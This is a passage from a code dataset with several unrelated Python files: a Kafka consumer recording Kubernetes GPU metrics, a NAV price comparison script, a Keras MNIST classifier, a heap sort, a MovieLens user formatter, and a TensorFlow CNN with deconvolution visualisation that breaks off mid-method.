#container['resources']['limits']['memory'] = None\n #container['resources']['limits']['nvidia.com/gpu'] = None\n\n if container['resources'].get('requests') != None:\n if container['resources']['requests'].get('cpu') == None:\n container['resources']['requests']['cpu'] = 0\n if container['resources']['requests'].get('memory') == None:\n container['resources']['requests']['memory'] = 0\n if container['resources']['requests'].get('nvidia.com/gpu') == None:\n container['resources']['requests']['nvidia.com/gpu'] = 0\n else:\n container['resources']['requests'] = {'cpu': 0, 'memory': 0, 'nvidia.com/gpu': 0}\n #continue\n #container['resources']['requests']['cpu'] = None\n #container['resources']['requests']['memory'] = None\n #container['resources']['requests']['nvidia.com/gpu'] = None\n \n if needGetFromContainer and False:\n print(container)\n jsonmsg['compute-quota']['used']['limits.cpu'] += conv2G(container['resources']['limits']['cpu'])\n jsonmsg['compute-quota']['used']['limits.memory'] += conv2G(container['resources']['limits']['memory'])\n jsonmsg['compute-quota']['used']['limits.nvidia.com/gpu'] += conv2G(container['resources']['limits']['nvidia.com/gpu'])\n jsonmsg['compute-quota']['used']['requests.cpu'] += conv2G(container['resources']['requests']['cpu'])\n jsonmsg['compute-quota']['used']['requests.memory'] += conv2G(container['resources']['requests']['memory'])\n jsonmsg['compute-quota']['used']['requests.nvidia.com/gpu'] += conv2G(container['resources']['requests']['nvidia.com/gpu'])\n\n container_id = insertContainerInfo(self.connection, {\n 'pod_id': pod_id, \\\n 'name': container['name'], \\\n 'limits.cpu': container['resources']['limits']['cpu'], \\\n 'limits.memory': container['resources']['limits']['memory'], \\\n 'limits.nvidia.com/gpu': container['resources']['limits']['nvidia.com/gpu'], \\\n 'requests.cpu': container['resources']['requests']['cpu'], \\\n 'requests.memory': container['resources']['requests']['memory'], \\\n 'requests.nvidia.com/gpu': container['resources']['requests']['nvidia.com/gpu'], \\\n 'nspid': container['nspid'], \\\n 'query_time': jsonmsg['query_time']\n })\n if container.get('gpu_uuid') != None:\n for gpu_uuid in container['gpu_uuid']:\n #print(gpu_uuid)\n gpu_id = get_gpu_id(self.connection, {'uuid': gpu_uuid})\n\n insertContainerGpus(self.connection, {\n 'pod_id': pod_id, \\\n 'container_id': container_id, \\\n 'gpu_id': gpu_id, \\\n 'nspid': container['nspid'], \\\n 'namespace_id': namespace_id\n })\n\n if self.gpu_info_cur.get(gpu_id) == None:\n self.gpu_info_cur[gpu_id] = namespace_id\n\n if needGetFromContainer and False:\n namespaceusedrq_id = insertNamespaceUsedResourceQuotas(self.connection, {\n 'namespace_id': namespace_id, \\\n 'limits.cpu': jsonmsg['compute-quota']['used']['limits.cpu'], \\\n 'limits.memory': jsonmsg['compute-quota']['used']['limits.memory'], \\\n 'limits.nvidia.com/gpu': jsonmsg['compute-quota']['used']['limits.nvidia.com/gpu'], \\\n 'requests.cpu': jsonmsg['compute-quota']['used']['requests.cpu'], \\\n 'requests.memory': jsonmsg['compute-quota']['used']['requests.memory'], \\\n 'requests.nvidia.com/gpu': jsonmsg['compute-quota']['used']['requests.nvidia.com/gpu'], \\\n 'query_time': jsonmsg['query_time']\n })\n\n return self.topic\n\n def processGpuStatus(self, hostname):\n print(self.topic)\n set_add = set()\n set_del = set()\n if self.topic == 'namespace_metrics':\n #print(self.gpu_info_cur)\n set_cur = set(self.gpu_info_cur.items())\n print(\"set_cur\", set_cur)\n\n set_pre = set(self.gpu_info_pre.items())\n print(\"set_pre\", set_pre)\n\n set_add = set_cur - set_pre\n set_del = set_pre - set_cur\n print(\"add \", set_add)\n print(\"del \", set_del)\n\n #self.gpu_info_pre = self.gpu_info_cur\n #print(\"pre\", self.gpu_info_pre)\n self.gpu_info_cur = {}\n\n for v in set_add:\n insertGpuInfo(self.connection, {'id': v[0], 'user': v[1]}, True)\n for v in set_del:\n insertGpuInfo(self.connection, {'id': v[0], 'user': None}, True)\n\n def run(self):\n consumer = KafkaConsumer(bootstrap_servers=kafka_broker+':9092',\n #auto_offset_reset='earliest',\n group_id = self.group_id,\n enable_auto_commit = True,\n consumer_timeout_ms = 100)\n consumer.subscribe([self.topic])\n\n try:\n while not self.stop_event.is_set():\n for message in consumer:\n topic = self.processMessage(message)\n #if self.topic == 'namespace_metrics':\n self.processGpuStatus(topic)\n #pos = consumer.position(self.mypartition)\n #print(\"[most recent offset]=\", pos)\n if self.stop_event.is_set():\n break\n except KeyboardInterrupt:\n print(\"stop!\")\n self.stop()\n \n consumer.close()\n \ndef main():\n tasks = [\n Consumer(topic = \"namespace_metrics\", group_id = \"namespace_metrics\"),\n Consumer(topic = \"gpu_metrics\", group_id = \"gpu_metrics\"),\n Consumer(topic = \"gpu_metrics\", group_id = \"gpu_used_status\")\n ]\n\n for t in tasks:\n t.start()\n time.sleep(2)\n\n #for t in tasks:\n # t.join()\n\n #time.sleep(10)\n \n #for task in tasks:\n # task.stop()\n\n #for task in tasks:\n # task.join()\n \n \nif __name__ == \"__main__\":\n logging.basicConfig(\n format='%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s',\n level=logging.INFO\n )\n main()\n","sub_path":"k8sdeployment/metric_consumer/kafka_consumer/metrics_consumer.py","file_name":"metrics_consumer.py","file_ext":"py","file_size_in_byte":43341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"323836250","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.abspath(__file__)) + \"/..\")\n\n\nfrom libs.ppstdlib import list_of_files\nimport pandas as pd\nfrom datetime import datetime as dt\n\nif len (sys.argv) != 2 :\n print (\"Usage: Directory of Data\")\n sys.exit (1)\n\narguments = sys.argv[1:]\n\n\n# setting up directory path\ndirpath = '/var/prism/Central/raw/amfi/{}/'.format(arguments[0])\n\n# Get all csv files to process\nlist_of_files = list_of_files(dirpath, \"csv\")\n\n# Extract times from the files and make list of times and sort it\ntime_list = set()\n\nfor path in list_of_files:\n if path:\n if \"_\" in path:\n time = path.rsplit('.')[0].rsplit('_')[1]\n time_list.add(dt.strptime(time, \"%H:%M:%S\"))\n\ntime_list = sorted(time_list)\n\n\nif list_of_files:\n date = list_of_files[0].rsplit('.')[0].rsplit('_')[0]\n\n# Get earliest file and load into pandas Data Frame\ntime_s = dt.strftime(time_list[1], \"%H:%M:%S\")\nfile = \"{}_{}.csv\".format(date, time_s)\nmerged_df = pd.read_csv(dirpath + file)\nmerged_df = merged_df[['Scheme Name','Net Asset Value']]\nprint(merged_df.head())\nmerged_df = start_df = merged_df.rename(columns = {'Net Asset Value':'pri'})\n\n# Rename the name of the column 'pri' with 'pri_'\nstart_suffix = dt.strftime(time_list[1], \"_%H:%M\")\nmerged_df = merged_df.rename(columns = {'pri':'pri{}'.format(start_suffix)})\n\nfor time in time_list[2:]:\n time_s = dt.strftime(time, \"%H:%M:%S\")\n end_prefix = dt.strftime(time, \"_%H:%M\")\n file = \"{}_{}.csv\".format(date, time_s)\n frame = pd.read_csv(dirpath + file)\n\n frame = frame[['Scheme Name','Net Asset Value']]\n print(frame.head())\n frame = frame.rename(columns = {'Net Asset Value':'pri'})\n\n inter_df = pd.merge(start_df, frame, on='Scheme Name', how='inner', \n suffixes=[start_suffix, end_prefix])\n\n merged_df = pd.merge(merged_df, inter_df[['Scheme Name','pri'+end_prefix]], on='Scheme Name', how='right')\n\n start_df = frame\n start_suffix = end_prefix\n\n# print(merged_df.info())\n# merged_df = merged_df.drop(['pri'],axis=1)\n# merged_df = merged_df.loc[:, ~merged_df.columns.str.endswith('_y')]\nprint(merged_df.head())\n\nstart = dt.strftime(time_list[1], \"%H:%M\")\nfor time in time_list[2:]:\n end = dt.strftime(time, \"%H:%M\")\n print(\"Comparing prices consistency between {} and {}\".format(start,end))\n print(merged_df.loc[merged_df['pri_'+start]!=merged_df['pri_'+end]].dropna())\n print(\"---------------------------------------------------------------------\")\n start = end\n","sub_path":"server/amfipriceflowbytime.py","file_name":"amfipriceflowbytime.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"461187565","text":"# Imports\nimport numpy as np\nnp.random.seed(123)\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nimport keras.utils\nfrom keras.datasets import mnist\nfrom matplotlib import pyplot as plt\nfrom keras import backend\n\n# Variables\nbatch_size = 128\nnum_classes = 10\nepochs = 12\nimg_rows, img_cols = 28, 28\n\n# Downloading Data\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train = x_train.astype('float32')/255\nx_test = x_test.astype('float32')/255\n\n# Fixing training dimensions\nif backend.image_data_format() == 'channels_first':\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\nelse:\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n# Define model architecture\nmodel = Sequential()\n \nmodel.add(Conv2D(32, (3, 3), activation='relu', input_shape=input_shape))\nmodel.add(Conv2D(32, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.25))\n \nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\n \n# Compile model\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n \n# Fit model on training data\nmodel.fit(x_train, y_train, \n batch_size=32, nb_epoch=10, verbose=1)\n \n# Evaluate model on test data\nscore = model.evaluate(x_test, y_test, verbose=0)","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"58476405","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n'''\n堆排序:\npython中的heapq模块实现了最小堆(也可视为根节点为最小值的完全二叉树)。\n在heapq数组中,第一个值始终是最小的。\n而且 heap[k] <= heap[2*k+1],heap[k] <= heap[2*k+2]\n算法原理参考:http://bubkoo.com/2014/01/14/sort-algorithm/heap-sort/\n'''\n\nimport random\nfrom heapq import *\n\n\ndef heapSort(seq):\n heapify(seq)\n return [heappop(seq) for i in range(len(seq))]\n\nseq = list(range(100))\nrandom.shuffle(seq)\nprint(seq)\nprint(heapSort(seq))\n","sub_path":"sortAlgorithms/heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"276013183","text":"import csv\n\ndef format_sex(sex):\n if sex == 'M':\n return [0]\n else:\n return [1]\n\ndef format_occ(occ, mapped):\n map_occ_id1 = {\"other\" : 0, \"academic\" : 1, \"educator\" : 1, \"artist\" : 2, \"clerical\" : 3, \"admin\" : 3, \"college\" : 4, \"grad student\" : 4,\n \"customer service\" : 5, \"doctor\" : 6, \"health care\" : 6, \"executive\" : 7, \"managerial\" : 7, \"farmer\" : 8, \"homemaker\" : 9,\n \"K-12 student\" : 10, \"lawyer\" : 11, \"programmer\" : 12, \"retired\" : 13, \"sales\" : 14, \"marketing\" : 14, \"scientist\" : 15,\n \"self-employed\" : 16, \"technician\" : 17, \"engineer\" : 17, \"tradesman\" : 18, \"craftsman\" : 18, \"unemployed\" : 19, \"writer\" : 20}\n\n map_occ_id2 = {'administrator': 4, 'executive': 3, 'retired': 18, 'lawyer': 6, 'entertainment': 9, 'marketing': 15, 'writer': 2, \n 'none': 16, 'scientist': 8, 'healthcare': 17, 'other': 1, 'student': 5, 'educator': 7, 'technician': 0, \n 'librarian': 11, 'programmer': 10, 'artist': 13, 'salesman': 19, 'doctor': 20, 'homemaker': 12, 'engineer': 14}\n\n ret = [0 for x in range(21)]\n\n if not mapped:\n if occ in map_occ_id2:\n ret[map_occ_id2[occ]] = 1\n return ret\n else:\n ret[int(occ)] = 1\n return ret\n\ndef format_age(age):\n ret = [0 for x in range(7)]\n\n age = int(age)\n\n if age < 18:\n ret[0] = 1\n elif age >= 18 and age <= 24:\n ret[1] = 1\n elif age >= 25 and age <= 34:\n ret[2] = 1\n elif age >= 35 and age <= 44:\n ret[3] = 1\n elif age >= 45 and age <= 49:\n ret[4] = 1\n elif age >= 50 and age <= 55:\n ret[5] = 1\n elif age >= 56:\n ret[6] = 1\n\n\n return ret\n\n\nr = csv.reader(open('ml-100k/u.user','rb'), delimiter='|')\nw = csv.writer(open('ml-100k/u.user.mod','wb'), delimiter='|')\n\nfor row in r:\n w.writerow([row[0]] + format_age(row[1]) + format_sex(row[2]) + format_occ(row[3], False))\n\nr = csv.reader(open('ml-1m/users.dat','rb'), delimiter='|')\nw = csv.writer(open('ml-1m/users.dat.mod','wb'), delimiter='|')\n\nfor row in r:\n w.writerow([row[0]] + format_age(row[2]) + format_sex(row[1]) + format_occ(row[3], True))\n","sub_path":"user_info_formator.py","file_name":"user_info_formator.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"585091476","text":"\n# Imports\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport random\nimport math\nfrom scipy.misc import imsave\n\n###\n### Convolutional Neural Network (CNN) for MNIST\n###\nclass CnnData2: ##### OBS: only works if stride size = filter size of pooling layer\n \n def __init__( self, session, n_in = 128, n_out = 3,\n filterSizeConv1 = 5, nFiltersConv1 = 32, \n filterSizeConv2 = 5, nFiltersConv2 = 32,\n filterSizeConv3 = 5, nFiltersConv3 = 64, \n filterSizePool1 = 2, strideFilter1 = 2,\n filterSizePool2 = 2, strideFilter2 = 2,\n filterSizePool3 = 2, strideFilter3 = 2,\n nChannels = 3, fcUnits = 1024, mode = True ):\n\n \t# instantiate session\n self.session = session\n self.n_in = n_in # number of pixels\n self.n_out = n_out # number of classes\n self.mode = mode #True to train\n self.nChannels = nChannels # number of channels (1=grayscale;3=colored)\n\n # convolution filter sizes\n self.filterSizeConv1 = filterSizeConv1\n self.filterSizeConv2 = filterSizeConv2\n self.filterSizeConv3 = filterSizeConv3\n \n # number of filters of each convolutional layer\n self.nFiltersConv1 = nFiltersConv1\n self.nFiltersConv2 = nFiltersConv2\n self.nFiltersConv3 = nFiltersConv3\n\n # pooling layer filter sizes\n self.filterSizePool1 = filterSizePool1\n self.filterSizePool2 = filterSizePool2\n self.filterSizePool3 = filterSizePool3\n\n # pooling layer stride\n self.strideFilter1 = strideFilter1\n self.strideFilter2 = strideFilter2\n self.strideFilter3 = strideFilter3\n\n # data placeholders\n #self.x = tf.placeholder(tf.float32, [None, n_in, n_in, nChannels], name='x')\n self.x = tf.placeholder(tf.float32, [None, int(n_in * n_in * nChannels )], name='x')\n self.y = tf.placeholder(tf.float32, [None, n_out], name='y')\n #self.x_in = tf.reshape(self.x, [-1, self.n_in * self.n_in])\n self.W_c1 = tf.get_variable( 'W_c1', shape = [ filterSizeConv1, filterSizeConv1, nChannels, nFiltersConv1 ] )\n self.W_c2 = tf.get_variable( 'W_c2', shape = [ filterSizeConv2, filterSizeConv2, nFiltersConv1, nFiltersConv2 ] )\n self.W_c3 = tf.get_variable( 'W_c3', shape = [ filterSizeConv3, filterSizeConv3, nFiltersConv2, nFiltersConv3 ] )\n\n ##\n ## Network Architecture\n ##\n\n # Input Layer\n self.input_layer = tf.reshape(self.x, [-1, self.n_in, self.n_in, self.nChannels])\n\n #\n # Convolutional Layer #1\n #\n\n # filter\n self.conv1 = tf.nn.conv2d(\n input = self.input_layer,\n filter = self.W_c1,\n padding = \"SAME\",\n strides = [1,1,1,1] )\n\n # relu\n self.relu1 = tf.nn.relu( self.conv1 )\n\n #\n # Pooling Layer #1\n #\n self.pool1 = tf.layers.max_pooling2d(inputs=self.relu1, pool_size=[self.filterSizePool1, self.filterSizePool1], strides=self.strideFilter1)\n\n\n #\n # Convolutional Layer #2\n #\n\n # filter b\n self.conv2 = tf.nn.conv2d(\n input = self.pool1,\n filter = self.W_c2,\n padding = \"SAME\",\n strides = [1,1,1,1] )\n\n # relu\n self.relu2 = tf.nn.relu( self.conv2 )\n\n #\n # Pooling layer #2\n #\n self.pool2 = tf.layers.max_pooling2d(inputs=self.relu2, pool_size=[self.filterSizePool2, self.filterSizePool2], strides=self.strideFilter2)\n\n\n #\n # Convolutional Layer #3\n #\n\n # filter\n self.conv3 = tf.nn.conv2d(\n input = self.pool2,\n filter = self.W_c3,\n padding = \"SAME\",\n strides = [1,1,1,1] )\n\n # relu\n self.relu3 = tf.nn.relu( self.conv3 )\n\n #\n # Pooling layer #3\n #\n self.pool3 = tf.layers.max_pooling2d(inputs=self.relu3, pool_size=[self.filterSizePool3, self.filterSizePool3], strides=self.strideFilter3)\n\n\n #\n # Dense Layer ---> PARAMETRIZE! change this 7\n #\n nReshape = (self.n_in/filterSizePool1/filterSizePool2/filterSizePool3) * (self.n_in/filterSizePool1/filterSizePool2/filterSizePool3) * nFiltersConv3\n pool3_flat = tf.reshape(self.pool3, [-1, int(nReshape)])\n dense = tf.layers.dense(inputs=pool3_flat, units=fcUnits, activation=tf.nn.relu)\n dropout = tf.layers.dropout(\n inputs=dense, rate=0.3, training = self.mode )\n\n # Logits Layer\n self.logits = tf.layers.dense(inputs=dropout, units = self.n_out)\n self.q = tf.argmax(input = self.logits, axis = 1) # leave 1?\n \n # Output Layer\n onehot_labels = tf.one_hot( indices = tf.cast(self.y, tf.int32), depth = self.n_out )\n self.loss = tf.nn.softmax_cross_entropy_with_logits(\n labels = self.y, logits = self.logits )\n\n self.train_step = tf.train.AdamOptimizer(1e-3).minimize(self.loss)\n\n \n # method to compute y given x\n def compute(self, x):\n return self.session.run(self.q, feed_dict={self.x:np.reshape(x,[-1,int(self.n_in*self.n_in*self.nChannels)])})\n #return self.session.run(self.q, feed_dict={self.x:np.reshape(x,[-1, self.n_in, self.n_in, self.nChannels])})\n \n # method to train network\n def train(self, x_batch, y_batch): \n # take a training step\n #_ = self.session.run(self.train_step, feed_dict={self.x: x_batch, self.y: y_batch})\n _ = self.session.run(self.train_step, feed_dict={self.x:np.reshape(x_batch,[-1,int(self.n_in*self.n_in*self.nChannels)]), self.y: y_batch})\n\n # acessor method for output after pooling layers\n def getPools(self):\n return ( self.pool1, self.pool2, self.pool3 )\n\n # acessor method for output after convolutional layers\n def getConvs(self):\n \treturn ( self.conv1, self.conv2, self.conv3 )\n\n # acessor method for loss\n def getLoss(self):\n return self.loss\n\n # acessor method to get filter weights of convolutional layers\n def getWeights(self):\n return (self.W_c1, self.W_c2, self.W_c3 )\n\n # method to initialize filter weights\n def initWeight(shape):\n weights = tf.truncated_normal(shape,stddev=0.1)\n return tf.Variable(weights)\n\n # method to instantiate deconvolutional neural net\n def createDeconvNet(self, inputImage, inputLabel):\n return CnnData2.DeconvData2( self, self.session, inputImage, inputLabel )\n\n # saver method to save trained cnn in disk \n def netSaver(self, savePath):\n saver = tf.train.Saver()\n saver.save(self.session, savePath)\n print(\"Model saved in file: %s\" % savePath)\n\n # loader method to restore weights of a pretrained cnn\n def netLoader(self, loadPath):\n loader = tf.train.Saver({\"W_c1\":self.W_c1, \"W_c2\":self.W_c2, \"W_c3\":self.W_c3})\n restoredModel= loader.restore(self.session, loadPath)\n print(\"Model restored from %s\" % loadPath)\n\n\n def activate(self, layer, image, sess):\n# \"\"\"\n# Within a tensorflow session, calls plotfilter\n# to display the activations of trained filters in a specific layer\n# after passsing an image.\n#\n# Parameters\n# ----\n# layer: int\n# image: ndarray of length 784\n# \"\"\"\n \n \n conv_layer = sess.run(layer, feed_dict={self.x:np.reshape(image, [ 1, 49152], order='F')})\n \n self.plotfilter(conv_layer)\n \n return conv_layer\n \n def plotfilter(self, conv_layer):\n# \"\"\"\n \n\n# Parameters\n# ----\n# conv_layer = [?, 28, 28, 32] tensor\n# \"\"\"\n# \n filters=conv_layer.shape[3]\n plt.figure(1,figsize=(25,25))\n n_columns = 6\n n_rows = math.ceil(filters / n_columns) + 1\n for i in range(filters):\n plt.subplot(n_rows, n_columns, i+1)\n plt.title('Filter ' + str(i))\n plt.imshow(conv_layer[0,:,:,i], interpolation=\"nearest\")\n\n\n\n\n ###\n ### Nested Class: Deconvolutional Neural Network (CNN) for MNIST\n ###\n class DeconvData2:\n \n def __init__( self, outer, session, inputImage, inputLabel ):\n\n \t# data placeholders\n \t#self.inputImage = tf.placeholder(tf.float32, [None, inDim], name='x')\n \t#self.inputLabel = tf.placeholder(tf.float32, [None, outDim], name='y')\n\n \t# instantiate outer class in inner class\n self.cnn = outer\n self.sess = session\n\n activations1 = self.calculateActivations( inputImage, inputLabel, 1 )\n self.deconv1 = self.deconvLayer1( inputImage, inputLabel, activations1 )\n activations2 = self.calculateActivations(inputImage, inputLabel, 2)\n self.deconv2 = self.deconvLayer2( inputImage, inputLabel, activations2 )\n activations3 = self.calculateActivations( inputImage, inputLabel, 3 ) \n self.deconv3 = self.deconvLayer3( inputImage, inputLabel, activations3 )\n\n\n def deconvLayer1( self, inputImage, inputLabel, activations1 ):\n\n \t#\n \t## Deconvoluting 1st layer\n \t##\n \n # get activations for layer 1\n #activations1 = self.calculateActivations( inputImage, inputLabel, 1 )\n\n # convert from array to tensor\n act1_tf = tf.convert_to_tensor( activations1, np.float32 )\n\n # unpool\n unPool1 = self.unpool( act1_tf )\n\n # unrelu\n unRelu1 = tf.nn.relu( unPool1 )\n\n \t# deconvolute (filter)\n unConv1 = tf.nn.conv2d_transpose( # check dimensions\n \t #activations1,\n unRelu1,\n self.cnn.W_c1,\n output_shape = [ inputImage.shape[0], self.cnn.n_in, self.cnn.n_in, self.cnn.nChannels ],\n strides = [1, 1, 1, 1],\n padding = \"SAME\" )\n\n return unConv1\n\n\n def deconvLayer2( self, inputImage, inputLabel, activations2 ):\n\n\n ##\n ## Deconvoluting 2nd layer\n ##\n\n # get activations for layer 2\n #activations2 = self.calculateActivations(inputImage, inputLabel, 2)\n\n # convert from array to tensor\n act1_tf = tf.convert_to_tensor( activations2, np.float32 )\n\n # 1st unpool\n unPool1 = self.unpool( act1_tf )\n\n # 1st unrelu\n unRelu1 = tf.nn.relu( unPool1 )\n\n # 1st deconvolute (filter)\n outputShape1 = int(self.cnn.n_in/self.cnn.filterSizePool1)\n unConv1 = tf.nn.conv2d_transpose( \n #activations1,\n unRelu1,\n self.cnn.W_c2,\n output_shape = [ inputImage.shape[0], outputShape1, outputShape1, self.cnn.nFiltersConv1],\n strides = [1, 1, 1, 1],\n padding = \"SAME\" )\n\n # 2nd unpool\n unPool2 = self.unpool( unConv1 )\n\n # 2nd relu\n unRelu2 = tf.nn.relu( unPool2 )\n\n # 2nd deconvolute (filter)\n unConv2 = tf.nn.conv2d_transpose( \n #activations1,\n unRelu2,\n self.cnn.W_c1,\n output_shape = [ inputImage.shape[0], self.cnn.n_in, self.cnn.n_in, self.cnn.nChannels],\n strides = [1, 1, 1, 1],\n padding = \"SAME\" )\n\n return unConv2\n\n\n def deconvLayer3( self, inputImage, inputLabel, activations3 ):\n\n\n ##\n ## Deconvoluting 3rd layer\n ##\n\n # get activations for layer 3\n #activations3 = self.calculateActivations(inputImage, inputLabel, 3)\n\n # convert from array to tensor\n act1_tf = tf.convert_to_tensor( activations3, np.float32 )\n\n # 1st unpool\n unPool1 = self.unpool( act1_tf )\n\n # 1st unrelu\n unRelu1 = tf.nn.relu( unPool1 )\n\n # 1st deconvolute (filter)\n outputShape1 = int((self.cnn.n_in/self.cnn.filterSizePool2)/self.cnn.filterSizePool1)\n unConv1 = tf.nn.conv2d_transpose( \n #activations1,\n unRelu1,\n self.cnn.W_c3,\n #output_shape = [ inputImage.shape[0], outputShape1, outputShape1, self.cnn.nFiltersConv1],\n output_shape = [ inputImage.shape[0], outputShape1, outputShape1, self.cnn.nFiltersConv2],\n strides = [1, 1, 1, 1],\n padding = \"SAME\" )\n\n\n # 2nd unpool\n unPool2 = self.unpool( unConv1 )\n\n # 2nd relu\n unRelu2 = tf.nn.relu( unPool2 )\n\n # 2nd deconvolute (filter)\n outputShape2 = int(self.cnn.n_in/self.cnn.filterSizePool1)\n unConv2 = tf.nn.conv2d_transpose( \n #activations1,\n unRelu2,\n self.cnn.W_c2,\n #output_shape = [ inputImage.shape[0], outputShape2, outputShape2, self.cnn.nChannels],\n output_shape = [ inputImage.shape[0], outputShape2, outputShape2, self.cnn.nFiltersConv1],\n strides = [1, 1, 1, 1],\n padding = \"SAME\" )\n\n\n # 3rd unpool\n unPool3 = self.unpool( unConv2 )\n\n # 3rd relu\n unRelu3 = tf.nn.relu( unPool3 )\n\n # 3rd deconvolute (filter)\n unConv3 = tf.nn.conv2d_transpose( \n #activations1,\n unRelu3,\n self.cnn.W_c1,\n output_shape = [ inputImage.shape[0], self.cnn.n_in, self.cnn.n_in, self.cnn.nChannels],\n strides = [1, 1, 1, 1],\n padding = \"SAME\" )\n\n return unConv3\n\n #Returns the random filter activation for layer 1\n def bestActivation1( self, inputImage, inputLabel, n_best=3, k=3):\n activations_layer1=self.calculateActivations( inputImage, inputLabel, 1)\n \n random.seed(3)\n filters_layer1=random.sample(range(activations_layer1.shape[-1]),k)\n j=0\n best_index=np.zeros([k,n_best])\n \n all_isolations = np.zeros([k, n_best, 64, 64, 1])\n \n \n \n for i in filters_layer1:\n isolated=activations_layer1.copy()[:,:,:,i]\n \n Norm1 = np.linalg.norm(isolated,axis=(1,2))\n #Norm2 = np.linalg.norm(Norm1, axis=1)\n \n best = np.argsort(Norm1)[-n_best:]\n best_index[j,:]=best\n \n \n all_isolations[j,:,:,:,] = np.reshape(isolated[best,],(n_best,64,64,1))\n j=j+1\n \n \n \n return all_isolations,best_index, filters_layer1\n \n #Returns the random filter activation for layer 2\n def bestActivation2( self, inputImage, inputLabel, n_best=3, k=3):\n activations_layer2=self.calculateActivations( inputImage, inputLabel, 2)\n random.seed(3)\n filters_layer2=random.sample(range(activations_layer2.shape[-1]),k)\n j=0\n best_index=np.zeros([k,n_best])\n \n all_isolations = np.zeros([k, n_best, 32, 32, 1])\n #print(activations_layer2.shape)\n \n \n for i in filters_layer2:\n isolated=activations_layer2.copy()[:,:,:,i]\n \n Norm1 = np.linalg.norm(isolated,axis=(1,2))\n #Norm2 = np.linalg.norm(Norm1, axis=1)\n \n best = np.argsort(Norm1)[-n_best:]\n best_index[j,:]=best\n \n isolated=np.reshape(isolated[best,],(n_best,32,32,1))\n \n all_isolations[j,:,:,:,] = isolated\n j=j+1\n \n \n \n return all_isolations,best_index, filters_layer2\n \n #Returns the random filter activation for layer 3\n def bestActivation3( self, inputImage, inputLabel, n_best=3, k=3):\n activations_layer3=self.calculateActivations( inputImage, inputLabel, 3)\n random.seed(3)\n filters_layer3=random.sample(range(activations_layer3.shape[-1]),k)\n j=0\n best_index=np.zeros([k,n_best])\n \n all_isolations = np.zeros([k, n_best, 16, 16, 1])\n #print(activations_layer2.shape)\n \n \n for i in filters_layer3:\n isolated=activations_layer3.copy()[:,:,:,i]\n \n Norm1 = np.linalg.norm(isolated,axis=(1,2))\n #Norm2 = np.linalg.norm(Norm1, axis=1)\n \n best = np.argsort(Norm1)[-n_best:]\n best_index[j,:]=best\n \n isolated=np.reshape(isolated[best,],(n_best,16,16,1))\n \n all_isolations[j,:,:,:,] = isolated\n j=j+1\n \n \n \n return all_isolations,best_index, filters_layer3\n \n #Returns de deconvoluted layer1 as numpy array, with isolated nodes,\n #and save the images on the \"img\" folder\n def displayFeatures1( self, inputImage, inputLabel, n_best = 3, k = 3):\n\n #\n ## Deconvoluting 1st layer\n ##\n \n # get activations for layer 1\n activations1 = self.calculateActivations( inputImage, inputLabel, 1 )\n random.seed(3)\n filters = random.sample(range(activations1.shape[-1]), k)\n aux = activations1.shape[0] - n_best\n \n all_isolations = np.zeros([k, n_best, 128, 128, 3])\n j = 0\n best_index = np.zeros([k, n_best])\n \n for i in filters:\n # Isolate filters\n print(\"Deconvoluting Layer 1 Filter: {}\".format(i))\n isolated = activations1.copy()\n isolated[:,:,:,:i] = 0\n isolated[:,:,:,i+1:] = 0\n\n Norm1 = np.linalg.norm(isolated[:,:,:,i], axis = (1, 2))\n #Norm2 = np.linalg.norm(Norm1, axis = 1)\n\n best = np.argsort(Norm1)[-n_best:]\n\n # devonvolute\n unConv1 = self.deconvLayer1( inputImage, inputLabel, isolated )\n \n u = unConv1.eval()\n \n u = u[best,]\n best_index[j,:] = best\n \n #imsave(\"img/Deconv1_Node_{}_of_Image1.jpg\".format(i), u[0,:,:,:])\n \n all_isolations[j,:,:,:,:] = u\n j = j + 1\n \n return all_isolations, best_index, filters\n\n\n def displayFeatures2( self, inputImage, inputLabel, n_best = 3, k = 3):\n\n ##\n ## Deconvoluting 2nd layer\n ##\n\n # get activations for layer 2\n activations2 = self.calculateActivations(inputImage, inputLabel, 2)\n random.seed(3)\n filters = random.sample(range(activations2.shape[-1]), k)\n aux = activations2.shape[0] - n_best\n \n all_isolations = np.zeros([k, n_best, 128, 128, 3])\n j = 0\n best_index = np.zeros([k, n_best])\n \n for i in filters:\n # Isolate filters\n print(\"Deconvoluting Layer 2 Filter: {}\".format(i))\n isolated = activations2.copy()\n isolated[:,:,:,:i] = 0\n isolated[:,:,:,i+1:] = 0\n \n Norm1 = np.linalg.norm(isolated[:,:,:,i], axis = (1, 2))\n #Norm2 = np.linalg.norm(Norm1, axis = 1)\n \n best = 